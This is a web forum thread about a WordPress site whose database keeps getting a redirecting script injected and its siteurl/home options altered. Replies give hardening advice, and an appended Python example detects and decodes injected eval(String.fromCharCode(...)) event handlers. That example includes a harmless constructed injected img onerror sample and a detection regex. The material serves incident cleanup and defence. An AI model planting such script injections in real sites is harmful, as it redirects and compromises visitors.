Script injected to WP database

Discussion in 'Server Operation' started by Taleman, Oct 14, 2019.

  1. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    On my server there is one Wordpress site that has several times now gotten scripts injected into its database. The script redirects the browser to some unrelated site, perhaps the cracker wants more traffic to that site or something. Also the wordpress siteurl and home are changed, so the browser goes to that other site.
    I have changed passwords and commanded users to be careful, but the same thing happened this weekend. Any idea how this injection is done and possible?
    The code that is injected looks like this (I added those ### so it could not be executed by mistake):
    I created a small program that removes those added strings, but it is a bother to shut down the website and clean the database.
  2. elmacus

    elmacus Active Member

    You do have Wordfence installed?
  3. till

    till Super Moderator Staff Member ISPConfig Developer

    The most likely reason is a vulnerable WP plugin. Check the access.log of the site for unusual requests and scan the website files for malware (just to be sure) that nothing got injected into files. In case you did not change the database password yet, change it through ISPConfig and in the wp-config.php file, chmod the wp-config.php file so that it's only readable for the user of this website and not for others or for the website group.
  4. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    I told the website creator to install WordFence after the first incident. At least after that the wp-config.php has not been readable by group and others.
    Reading the access log, it may be the incident happened 5th of October. That is a bit hard to believe, this website is used actively, surely this kind of attack would be discovered the same day.
    Anyway, reading access logs did not reveal to me any info on how the attack was made. Maybe the user has malware on his/her workstation that does this or steals passwords.
    I have now again changed all passwords related to this website, including ispconfig user password.
  5. Steini86

    Steini86 Active Member

  6. Taleman

    Taleman Well-Known Member HowtoForge Supporter

    CSP looks interesting.
    Is there a reason Wordpress et al do not prevent writing <script> in the blog text? Or not sanitize the blog text when sending to website visitor?
    Could I write in this forum message with javascript embedded and get it executed in visitors' browsers?
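As an added example (not code from the thread or from WordPress), this is the kind of check Taleman's cleanup program could run before touching the database: it scans exported post content for inline event handlers wrapping eval(String.fromCharCode(...)), decodes the character codes so an analyst can read what the payload does, and reports siteurl/home values that no longer point at the expected site. The sample rows, the expected URL and the encoded payload are constructed stand-ins, not the thread's real data.

```python
import re

# Constructed sample rows, standing in for `SELECT ID, post_content FROM wp_posts`
# and `SELECT option_name, option_value FROM wp_options`. The encoded payload is a
# harmless constructed stand-in (it decodes to a plain string), not the real one.
SAMPLE_POSTS = {
    1: "<p>Normal post content.</p>",
    2: "<p>Hi</p><img src=x onerror=eval(String.fromCharCode("
       + ",".join(str(ord(c)) for c in "console.log(1)") + "))>",
}
EXPECTED_SITE = "https://blog.example"  # constructed expected value for siteurl/home
SAMPLE_OPTIONS = {"siteurl": "https://tampered.invalid", "home": "https://blog.example"}

# Inline event handler (onerror=, onfocus=, onload=, ...) whose value is
# eval(String.fromCharCode(<digits>)), the shape of the injection in this thread.
INJECT_RE = re.compile(
    r"\bon\w+\s*=\s*[\"']?\s*eval\(String\.fromCharCode\(([\d,\s]+)\)\)", re.I
)


def decode_charcodes(codes: str) -> str:
    """Turn the comma-separated code list back into text for analyst review."""
    return "".join(chr(int(n)) for n in codes.split(",") if n.strip())


def scan_posts(posts: dict) -> dict:
    """Return {post_id: [decoded payloads]} for posts carrying the injection pattern."""
    hits = {}
    for pid, content in posts.items():
        found = [decode_charcodes(m.group(1)) for m in INJECT_RE.finditer(content)]
        if found:
            hits[pid] = found
    return hits


def check_site_options(options: dict, expected: str) -> list:
    """Report siteurl/home options whose value differs from the expected site URL."""
    return [name for name in ("siteurl", "home") if options.get(name) != expected]


if __name__ == "__main__":
    for pid, payloads in scan_posts(SAMPLE_POSTS).items():
        print(f"post {pid}: injected handler decodes to {payloads!r}")
    for name in check_site_options(SAMPLE_OPTIONS, EXPECTED_SITE):
        print(f"option {name} tampered: {SAMPLE_OPTIONS[name]!r}")
```

Run it against a real export by replacing the two sample dicts with rows fetched from the database; a hit means the row needs manual review and cleanup, and a tampered option means the redirect is still live.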
